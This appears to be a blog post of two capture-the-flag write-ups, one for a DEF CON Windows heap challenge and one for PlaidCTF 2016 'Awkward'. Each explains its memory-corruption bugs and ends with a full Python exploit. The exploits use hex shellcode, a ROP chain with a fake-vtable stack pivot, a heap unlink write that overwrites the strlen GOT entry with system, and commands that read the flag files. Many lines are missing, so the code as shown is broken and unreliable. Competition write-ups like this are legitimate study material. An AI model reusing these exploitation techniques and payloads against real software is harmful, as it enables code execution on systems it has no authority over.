I tried to transcribe this to z3 to find the inverse, painstakingly debugged an issue where using v2>>5 instead of LShR(v2,5) caused z3 to hang indefinitely, and I could finally send commands! My first successful use of z3 in a CTF!

As soon as I started reversing the commands, however, I immediately found that command number 2 called a function that performed the inverse operation all along. I transcribed that C code to Python, hung my head in shame, and moved on with the challenge.

To explain the commands, I will annotate the source LegitBS kindly release on GitHub (DefconChal2.cpp, I will however note that lines 91 to 93 are definitely not in the binary (and might have made things a lot easier).

In the end I used commands 1, 2, and 5 to write the exploit. But the seemingly endless collection of useless or painfully hard to use bugs is worth noting (starting with the “does-nothing” crypto initialization).

  // allocates room for 128 buffers, even though bufferPointer is
  // limited to 63 (this makes a reference to bufferPointer*2 in
  // command 8 safe, though)
  uint32_t **buffers = (uint32_t **)halloc(512);
  uint32_t bufferPointer = 0;
  while (1) {
    uint32_t buf[2] = {0};
    int newSize;
    readn(buf, 2, agreeKey);
    newSize = buf[1];
    uint32_t *toUse;
    if (bufferPointer > 63) {
    switch (buf[0]) {
    case 1:
      // newSize is signed, so we could allocate -4 if we wanted,
      // or smaller numbers to get a possibly-interesting NULL
      // pointer dereference. Of course, this would "scanf" pretty
      // much indefinitely.
      if (newSize < 2048) {
        toUse = (uint32_t *)halloc(newSize + 4);
      } else {
      toUse[0] = buf[1];
      readn(&toUse[1], buf[1] / 4, agreeKey);
      buffers[bufferPointer++] = toUse;
    case 2:
      // Send back the buffer
      if (buf[1] < 64 && buffers[buf[1]] != 0) {
        writen(&(buffers[buf[1]][1]), buffers[buf[1]][0] / 4, agreeKey);
    case 3:
      // Free a buffer
      if (buf[1] < 64 && buffers[buf[1]] != 0) {
        buffers[buf[1]] = 0;
      } else {
    case 4: {
      // This looks like it leaks the address of ntdll, but "hm += 4" adds
      // 4 * sizeof (HMODULE*) = 16 bytes, so it corrupts the heap. It
      // also doesn't store the new allocation in the "buffers" array, so
      // it's useless.
      HMODULE *hm = (HMODULE *)halloc(sizeof(HMODULE) + 4);
      *(uint32_t *)hm = (uint32_t)sizeof(HMODULE);
      hm += 4;
      *hm = LoadLibrary(L"ntdll.dll");
    } break;
    case 5: {
      // This is the only crazy one I could use. "b1" can be buffer 0 (the
      // first buffer allocated), or buffer 64 (see command 8?)
      int b1 = buf[1] & 64;
      int b2 = (buf[1] >> 8) & 63; // any buffer 0 through 63
      if (buffers[b1] == NULL || buffers[b2] == NULL) {

      // copy using the length from b1
      memcpy(&buffers[b1][1], &buffers[b2][1], buffers[b1][0]);

      // Set the length of b1 to the length of b2, potentially growing the
      // buffer. This has a lot of advantages.
      buffers[b1][0] = buffers[b2][0];

      // Free the second buffer without removing it from the list (so you
      // could double-free it, use the free list pointers as buffer length,
      // etc.)
    case 6:
      // This looks like a nice arbitrary read, because it doesn't check
      // the bounds of "buffers". Except there's no way to get the
      // result - it just leaves it on the stack. And it calls
      // "readn(..., 1, ...)" which uses the uninitialized memory in
      // offset[1] which makes the chosen index basically random.
      uint32_t offset[2];
      uint32_t *myBuf = buffers[buf[1]];
      char toEnc[8] = {0};
      readn(offset, 1, agreeKey);
      if (offset[0] < myBuf[0] / 4) {
        sprintf(toEnc, "%08x\n", myBuf[offset[0] + 1]);

    } break;
    case 7: {
      // This looks like a nice arbitrary write, but again, it uses
      // readn(..., 1, ...), twice. Maybe z3 could have solved the second
      // one, but the local values seemed to contain random stack
      // addresses when I tried it.
      uint32_t offset[2];
      uint32_t *myBuf = buffers[buf[1]];
      readn(offset, 1, agreeKey);
      if (offset[0] < myBuf[0] / 4) {
        readn(&myBuf[offset[0] + 1], 1, agreeKey);
    } break;
    case 8: {
      // This makes the same mistake as case 4 of adding
      // 4*sizeof(SYSTEM_INFO) and even worse, stores the wrong pointer
      // into the buffers array (where it could be freed - the bugs are
      // endless). It also uses bufferPointer*2 as the index, which is
      // interesting because it's the only way we could write to
      // buffers[64] (which we can access in command 5). (As noted above,
      // the array is big enough that this isn't out-of-bounds.)
      uint32_t *val;
      LPSYSTEM_INFO lpinfo = (LPSYSTEM_INFO)halloc(sizeof(SYSTEM_INFO)+4);
      val = (uint32_t *)lpinfo;
      lpinfo += 4;
      val[0] = sizeof(SYSTEM_INFO);
      buffers[bufferPointer * 2] = (uint32_t *)lpinfo;
    } break;

Okay, so I trust you read cases 1, 2, and 5. The first trick I found was to leak a lot of heap memory. This works (at a guess) by using the free list pointer to read out of bounds:

send_pair(1, 3)  # allocate a buffer with zero items
send_pair(6, 0)  # free the buffer, without removing it from the list
send_pair(2, 0)  # read the buffer

(At this point it’s worth noting another bug: in the “read the buffer” command, the first two DWORDs are encoded, and every subsequent DWORD is transmitted as it. Useless, but confusing.)

This would dump a large amount of heap memory, then crash. I used WinDbg’s !heap command to try to understand, and I think this is because the allocation landed in an LFH region in the heap somewhere early on. It was useful because this leaked out some recognisable pointers into the binary, making it possible to figure out the remote ASLR slide. (It’s worth mentioning that Windows pretty much only randomizes module addresses once per boot, so the location of the binary was the same every time I connected to the same server).

The bug I planned to exploit was in command 5, which can grow the buffer. This gives you an arbitrary out-of-bounds heap read and write:

send_pair(1, 3)            # allocate a buffer with zero items
send_pair(1, 2040)         # allocate a buffer with 2040 items
send_sequence([0] * 2040)
send_pair(6, 1 << 8)       # set the length of the first buffer to 2040
send_pair(2, 0)            # read the buffer
send_pair(1, 2040)         # allocate a new buffer with 2040 items
send_sequence([0x41414141] * 2040)
send_pair(6, 2 << 8)       # copy the data to the buffer this time

Now, my master plan was to allocate the first buffer immediately before “buffers” array on the heap and control it. I had an EC2 instance set up to try to replicate the conditions and I tried a few different allocation sizes and eventually got this working. Nice!

Fortunately, I had to foresight to try to reproduce this result on the remote server. It didn’t work. I still don’t know why.

However, I did notice a new pointer into the binary that I hadn’t seen before when I used an allocation size of 24. This was a pointer to a vtable, which IDA recognised as that of “std::locale::_Locimp”, some part of the statically linked C++ runtime code. Unfortunately, I couldn’t see this locally, but as it was my only lead, I decided to try exploiting it remotely, with no way to debug it.

But how could I make a fake vtable? I needed to figure out the address of my data on the heap. Item zero gave a read-write size of 2040, but if I allocated another buffer after it (in the randomized LFH), I could modify its length to be an arbitrary value, leaking enough of the heap to reveal the buffers array. From here, I could find one of my buffers that contained a vtable. I filled a buffer with the pointer to the following gadget:

 .text:00401850 push offset a08x08x08x08x ; "%08x %08x %08x %08x\n"
 .text:00401855 call printf

And then changed the vtable pointer to point to it. Nothing happened. Then I sent an invalid free command and suddenly it printed the four hex values! The first one printed was the return address, which I figured out was inside an _atexit handler. I had eip control!

From here, painstaking step by painstaking step I wrote my ROP chain without a debugger. One interesting note is the pivot I used:

 les esp, ptr [eax] ; pop esi ; pop ebp ; ret

Not being familiar with the les instruction(“Load Far Pointer”) I had assumed it loaded a pointer from the es segment. This was a mistake (and a very tricky mistake to debug blindly). It turns out it loads a 48-bit pointer from memory, with the high 16 bits going into the es segment register. I found the value of es on my Windows test server, and corrected my fake vtable to be:

 vtable = [
    rop_chain_address, # value for esp
    0x2B,              # value for the "es" segment
    slide(0x00405b04), # les esp, ptr [eax] ; pop esi ; pop ebp ; ret

From here, I used my ROP chain to call the “writen” function and dump out the address of functions in kernel32 (from easier’s imports). I then called VirtualAlloc to protect some shellcode and returned into it.

Victory, right?

Nope, just to add to the frustration, I couldn’t manage to open the flag file. I tried using WinExec to run commands (I don’t think I got any output). I tried using CreateFileA, and debugged it using GetLastError and printf (I was initially passing the wrong arguments). I eventually called GetProcAddress(LoadLibraryA(“msvcrt”), “system”) and managed to run commands. echo hello worked, but dir and type flag.txt both output Access denied. I ran GetCurrentDirectoryA(…) and printed the result, and eventually figured out the winning command to pass to system:

type "C:\Users\Administrator\Desktop\Defcon Chal\key.txt"

Was this necessary? In hindsight I imagine not, but it was what finally worked.

Many thanks to LegitBS for the most incredibly frustrating challenge I have ever done. I hate thing2 too 🙂


The slightly-cleaned-up code is below. Note that it contains a few hardcoded addresses, which were found using different ROP chains or shellcodes.

import socket
import struct
import random
import string
import time
import sys

shellcode = '648b250400000081ec00020000e83a000000747970652022433a5c55736572735c41646d696e6973747261746f725c4465736b746f705c446566636f6e204368616c5c6b65792e7478742200be30b71b75ffd6be5018eb00ffe6'.decode('hex')

# align to 8 bytes
while len(shellcode) % 8: shellcode += '\0'
shellcode_dwords = [struct.unpack_from('I', shellcode, i)[0] for i in range(0, len(shellcode), 4)]

# usual boilerplate
ADDRESS = ('', 8989)

sock = None
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '<', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
        s += b
    return s

def send(s):
    if VERBOSE:
        print '>', `s`

# specific code
def encode(v1, v2):
    value = 0
    lookup = [1,2,3,4]
    for i in range(64):
        v1 = (v1 + ((value + lookup[value & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
        value -= 0x160D0365;
        v2 = (v2 + ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
    return v1, v2

def decode(v1, v2):
    value = 0x7CBF26C0
    lookup = [1,2,3,4]
    for i in range(64):
        v2 = (v2 - ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
        value += 0x160D0365
        v1 = (v1 - ((value + lookup[value         & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
    return v1, v2

def send_pair(v1, v2):
    v1, v2 = encode(v1, v2)
    send(str(v1) + 'x ' + str(v2) + 'x\n')

def send_sequence(l):
    l = l[:]
    n = len(l) & 1
    if n:
    for i in range(0, len(l), 2):
        l[i], l[i+1] = encode(l[i], l[i+1])
    if n:
        l = l[:-1]
    send(' '.join('%dx' % i for i in l) + '\n')

def allocate_item(size, data):
    send_pair(1, size)

def read_item(item):
    send_pair(2, item)
    r = [int(i,16) for i in read_until('\n').split()]
    if len(r) >= 2:
        r[0], r[1] = decode(r[0], r[1])
    return r

def free_item(item):
    send_pair(3, item)

def operation_5(zero_or_40, src_idx):
    send_pair(5, zero_or_40 | (src_idx << 8))

def try_to_win():
    global VERBOSE
    global sock
    print ADDRESS

    sock = socket.create_connection(ADDRESS)

    # do the pointless handshake
    values = read_until('\n').split()
    send('4 5 6 7\n')

    # this size allocates in an LHF block preceeding the vtable on the remote
    # server
    size = 24
    current_item = 0
    allocate_item(size, [2] * (size/4)); current_item += 1

    # allocate the largest item we can
    grow_item = current_item
    allocate_item(2040, [2] * (2040/4)); current_item += 1

    # allocate more items in the same LFH block, so we can grow one of them
    # to leak even more heap memory
    for i in range(19):
        allocate_item(24, [0x12345678,current_item,0,0,0,0]); current_item += 1

    # copy 24 bytes to our first allocation, and set its size to 2040
    operation_5(0, grow_item)

    # read out the 2040 bytes
    original = read_item(0)

    # try to find the vtable
    vtable_index = None

    for i, v in enumerate(original):
        if (v & 0xFFFF) == 0xc134:
            image_base = v - 0x1c134
            print hex(image_base)
            vtable_index = i
            print 'found vtable at offset', i
        # just retry
        print 'no vtable! :('
        return False

    # try to find one of our other buffers
    for i, v in enumerate(original):
        if i + 1 < len(original) and v == 0x12345678:
            leak_item_index = i-1
            leak_item_id = original[i+1]
            print 'found item', original[i+1], 'at index', leak_item_index
        print 'no item'
        return False

    # grow our leak item so we can read 9KB of heap memory
    update = original[:]
    update[leak_item_index] = 0x2400

    # we write to our 2040 byte window by allocating a new item
    # and doing operation 5 again. this copies 2040 bytes.
    update_item = current_item
    allocate_item(2040, update); current_item += 1

    operation_5(0, update_item)

    # leak 9KB of memory for the first time.
    # this should include the array of pointers to our buffers, which will
    # allow us to find the address of our buffers and construct complex data.
    leak_1 = read_item(leak_item_id)
    print ' '.join('%x' % i for i in leak_1)

    # allocate the shellcode
    allocate_item(len(shellcode_dwords)*4, shellcode_dwords); current_item += 1

    # find the pointer to the shellcode by leaking 9KB again, and looking at
    # the changes made to the memory
    leak_2 = read_item(leak_item_id)

    for i, (a,b) in enumerate(zip(leak_1, leak_2)):
        if i == 0 or i == len(leak_1) - 1: continue
        if leak_1[i-1] != 0 and leak_2[i-1] != 0 and a == 0 and b != 0 and leak_1[i+1] == 0 and leak_2[i+1] == 0:
            print 'index is', hex(i)
            my_string_addr = leak_2[i] + 4
            print 'my_string_addr @ ' + hex(my_string_addr)
        print 'couldnt find my_string_addr'
        return False

    # generate our rop chain, using the shellcode address

    def slide(x):
        return x - 0x400000 + image_base

    # (unused) gadget for debugging
    definitely_printf_4 = slide( 0x401850 )

    # (unused) function for dumping memory
    # I used this, combined with some "pop" gadgets to dump the import
    # pointers and find the kernel32 base address.
    write_function = slide( 0x40F13A )

    # just a ret instruction
    rop_nop = slide( 0x40F21B )

    # This could be calculated at the time, but once-per-boot ASLR is too
    # convenient not to take advantage of.
    kernel32_base = 0x770e0000

    virutalalloc = 0x6B818B90-0x6B810000+kernel32_base

    rop_chain = [
        # make some room for the stack, so it won't corrupt the heap
        rop_nop, # esi
        rop_nop, # ebp
        rop_nop, # first gadget

    # allocate the rop chain
    while len(rop_chain) < (0x100/4):
    assert len(rop_chain) == (0x100/4)

    allocate_item(0x100, rop_chain); current_item += 1

    # find the rop chain as before
    leak_3 = read_item(leak_item_id)

    for i, (a,b) in enumerate(zip(leak_2, leak_3)):
        if i == 0 or i == len(leak_2) - 1: continue
        if leak_2[i-1] != 0 and leak_3[i-1] != 0 and a == 0 and b != 0 and leak_2[i+1] == 0 and leak_3[i+1] == 0:
            print 'index is', hex(i)
            my_rop_chain = leak_3[i] + 4
            print 'my_rop_chain @ ' + hex(my_rop_chain)
        print 'couldnt find my_rop_chain'
        return False

    # create the vtable, using the pointer to the rop chain
    vtable = [
        0x2B,               # value for the "es" segment
        slide(0x00405b04),  # les esp, ptr [eax] ; pop esi ; pop ebp ; ret

    while len(vtable) < (0x40/4):
    assert len(vtable) == (0x40/4)

    # allocate the vtable
    allocate_item(0x40, vtable); current_item += 1

    # find the vtable as before
    leak_4 = read_item(leak_item_id)

    for i, (a,b) in enumerate(zip(leak_3, leak_4)):
        if i == 0 or i == len(leak_3) - 1: continue
        if leak_3[i-1] != 0 and leak_4[i-1] != 0 and a == 0 and b != 0 and leak_3[i+1] == 0 and leak_4[i+1] == 0:
            my_vtable = leak_4[i] + 4
            print 'my_vtable @ ' + hex(my_vtable)
        print 'couldnt find my_vtable'
        return False

    # now we can just corrupt the existing vtable to point to our fake one
    VERBOSE = True
    update[vtable_index] = my_vtable
    update_item = current_item
    allocate_item(2040, update); current_item += 1

    operation_5(0, update_item)

    # invoke exit, to trigger the atexit handler to trigger the virtual call

    # read forever, dumping output to stderr (hangs)

while True:
    # hangs if successful

PlaidCTF 2016 – Awkward [Pwnable 600]

Awkward was an exploitation challenge, providing a pretty serious “awk” like interpreter, with a variety of different bugs.

I used IDA and Hex-Rays extensively to reverse it.

After a bit of reversing, I got it running simple programs like this:

FINISH { printf "%d", 1; }

And, mostly by lucky guess found the information leak vulnerability, where printf failed to check types, allowing leaking heap addresses with:

 printf "%x", "string";

And reading strings from arbitrary addresses with:

 printf "%s", 12345678;

This was all I had for probably 10 hours. I reversed most of the interpreter, the hash-map, deeply investigated some weird behaviour with regards to string splitting, field-separators and string joining. Nothing. Eventually I found another (probably unintended) information leak vulnerability, which looked like:

 "string"; x = y;

If y was an uninitialized variable, x would become the address of “string”.

Finally, and somewhat apprehensively, I embarked on reversing the last remaining component: the regex engine. Finally, I found the corruption bug – when parsing character sets ([abc] notation), the byte values were being sign-extended before writing bits into a bitmap.

Screen Shot 2016-04-18 at 10.23.37 PM.png

(v24 is an int, from a sign-extended character)

This allowed setting bits before the start of the bitmap using bytes 80 to FF. This allows only a handful of fields to be corrupted. Long story short, there was a “next” pointer field which was initialised to NULL earlier in the structure. I could write into it bit-by-bit, and as long as it was the last thing in the regex it would keep the new value (otherwise it would be overwritten by a real next value).

I took some notes on which byte values mapped to which bits, just by trying it and looking at the crash address in gdb, and eventually figured out the rules. I probably should have used a mathematical approach to calculate it, but sometimes it’s safer to just trust what you can see:

 # NOTE: 0xC0 -> 1
 # NOTE: 0xB9 -> 2
 # NOTE: 0xBA -> 4
 # NOTE: 0xBB -> 8
 # NOTE: 0xBC -> 10
 # NOTE: 0xBF -> 80
 # NOTE: 0xC8 -> 100
 # NOTE: 0xC1 -> 200
 # NOTE: 0xC2 -> 400
 # NOTE: 0xC7 -> 8000

I combined it into the following python for setting an arbitrary address:

 target = 0x12345678
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 chrs = ''
 for i in range(0, 32):
     if target & (1 << i):
         chrs += chr(lookup[i])
 print 'print ' + str(i) + ', "hello" ~ /[' + chrs + ']/;'

I spent a few hours poking around different options for what to confuse with a “next” node before realising that if the first byte is a safe value it doesn’t crash and just frees the provided address.

I spent longer pondering what I should free before deciding on the “fields” array (pretty much the only array the code can access). This is an array of char* that is initialised by splitting the input line, but you can reallocate it to be a pretty arbitrary size by assigning to it. You can then write pointers to arbitrary strings into it. Pretty convenient, right?


I found the address of the fields array by leaking some strings on either side of it in the heap and adding a constant offset:

 str = "aaaabbbbccccddddeeeeffffgggghhhh";
 # duplicate the string and get its address a few times
 str; q = z;
 str; r = z;
 str; s = z;
 str; t = z;
 # reallocate fields array
 $128 = "1";
 # get one after it for reference
 str; u = z;
 # dump the addresses
 printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
 printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;
 x = t + 112;
 printf "fields array: %x\n", x;

I then rewrote my arbitrary-free to use awk to construct the regex:

 code = 's = "he[";\n'
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 for i in range(31, -1, -1):
     code += 'if (x >= ' + str(1<<i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1<<i) + '; }\n'
 code += 's = s "]";\n'
 code += 'print "hello" ~ s;\n'

So, this is enough to free the fields array, but I needed to turn it into an arbitrary write. I chose to use the linked list removal operation of the variable hashmap for this (a super awkward technique, as you’ll see).

Screen Shot 2016-04-18 at 9.56.48 PM.png

Once the fields-array was freed, I declared a new variable to reallocate the variables hashmap into the freed memory (and I declared enough variables earlier to make sure that this would cross the 70% threshold on line 61).

Because I could leak the address of arbitrary string data I could construct some very complex structures in memory. I used this to create a fake hashmap_entry structure, with the name pointing to a real name string. I inserted this structure in the correct slot in the hashmap by writing into the fields array, then declared a real variable with the same name, running the unlinking code in the listing above.

I wanted to use the code on line 38 write to an arbitrary address, but unfortunately the “next” address had to be a valid address as well. To solve this I leaked the address of a large string in memory, and chose offsets into the string to control the low byte of the address. This allowed an arbitrary pointer to be written by repeating the “unlinking” primitive four times (increasing the write address each time).

I used the printf leak to leak the address of strlen from the GOT then added an offset to find the address of system (since my local libc was the same), and used the unlinking technique to replace the value. strlen was used by printf when printing strings, so after corruption I could get the flag by writing:

 printf "%s\n", "cat flag\n"; 

Full Code

The full code for my exploit (in all of its hasty awkward messiness) is listed below. It has a few more tricks that hopefully don’t need too much explanation. I’m afraid I used a rather inappropriate variable name (after 20 hours of hitting my head against this problem I was a bit frustrated), and then hardcoded the hash value making it too error-prone to change after the fact. Sorry.

import socket
import struct
import random
import string
import time
import sys

ADDRESS = ('', 10241)
ADDRESS = ('', 2323)

sock = socket.create_connection(ADDRESS)
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '<', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
            if b == '\n':
        s += b
    return s

def send(s):
    if VERBOSE:
        print '>', `s`

program = '''
    FS = "xyz";
    if ( $1 == "r" ) { printf ">>>%s<<<\n", 0 + $2; }
    if ( $1 == "a" ) { printf ">>>%d<<<\n", $2; }
    if ( $1 == "s" ) { saved0 = $2; saved1 = $3; saved2 = $4; saved3 = $5; }
    if ( $1 == "l" )
for i in range(5):
    program += "padding%d = \"0\";" % i;
program += '''
        str = "aaaabbbbccccddddeeeeffffgggghhhh";
        str; q = z;
        str; r = z;
        str; s = z;
        str; t = z;
        $128 = "1";
        str; u = z;

        print q;
        printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
        printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;

        x = t + 112;
        #x = 305419896;
        printf "freeing %x\n", x;

        s = "he[";
lookup = [0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) + [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8)
for i in range(31, -1, -1):
    program += 'if (x >= ' + str(1 << i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1 << i) + '; }\n'
program += '''
        s = s "]";
        print x;
        print s;
        print "hello" ~ s;
        realloc = 1;
        $50 = saved0;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved1;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved2;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved3;
        print "alive";
        fuck = 1;
        print "alive?";

        printf "%s\n", "cat flag\n"; 
        print "alive??";

#0xf75cb180 <system
#0xf7607690 <strlen


def read_address_string(a):
    send("rxyz%d\n" % (a,))
    return read_until('<<<')[:-3]

def get_address_of_string(a):
    assert ' ' not in a and '\n' not in a
    send("axyz%s\n" % (a,))
    return int(read_until('<<<')[:-3])

def read_at_least(a, n):
    r = ''
    while len(r) < n:
        r += read_address_string(a + len(r)) + '\0'
    return r

def read_dword(a):
    return struct.unpack_from('I', read_at_least(a, 4))[0]

strlen_got = 0x8052040
strlen = read_dword(strlen_got)

system = strlen + (0xf759b180-0xf75e13c0)
print hex(strlen)

junk_string = 'a' * 1024

scratch_start = get_address_of_string(junk_string)

name = get_address_of_string('fuck')
def generate_block(write_to, byte):
    target = (scratch_start + 256) & ~0xFF
    next_in_chain = prev_in_chain = next_ = prev = cache = target + byte
    type_ = 0x41414141
    value = 0x41414141

    next_offset = 0x8
    prev = write_to - next_offset

    print map(hex, (next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache))
    return struct.pack('IIIIIIII', next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache);

def do_hash(name):
    h = 0
    for i in name:
        h = ord(i) + 1337 * h
    return h

def save(a,b,c,d):
    for s in (a,b,c,d):
        assert '\n' not in s, `s`
        assert 'xyz' not in s, `s`
        assert '\0' not in s, `s`
    send("sxyz%sxyz%sxyz%sxyz%s\n" % (a,b,c,d))

print do_hash('fuck') % 64

    generate_block(strlen_got, (system & 0xFF)),
    generate_block(strlen_got+1, ((system >> 8) & 0xFF)),
    generate_block(strlen_got+2, ((system >> 16) & 0xFF)),
    generate_block(strlen_got+3, ((system >> 24) & 0xFF)),
raw_input('attach?') # ps aux | grep ' ./awkw' | grep -v grep | cut -c10-15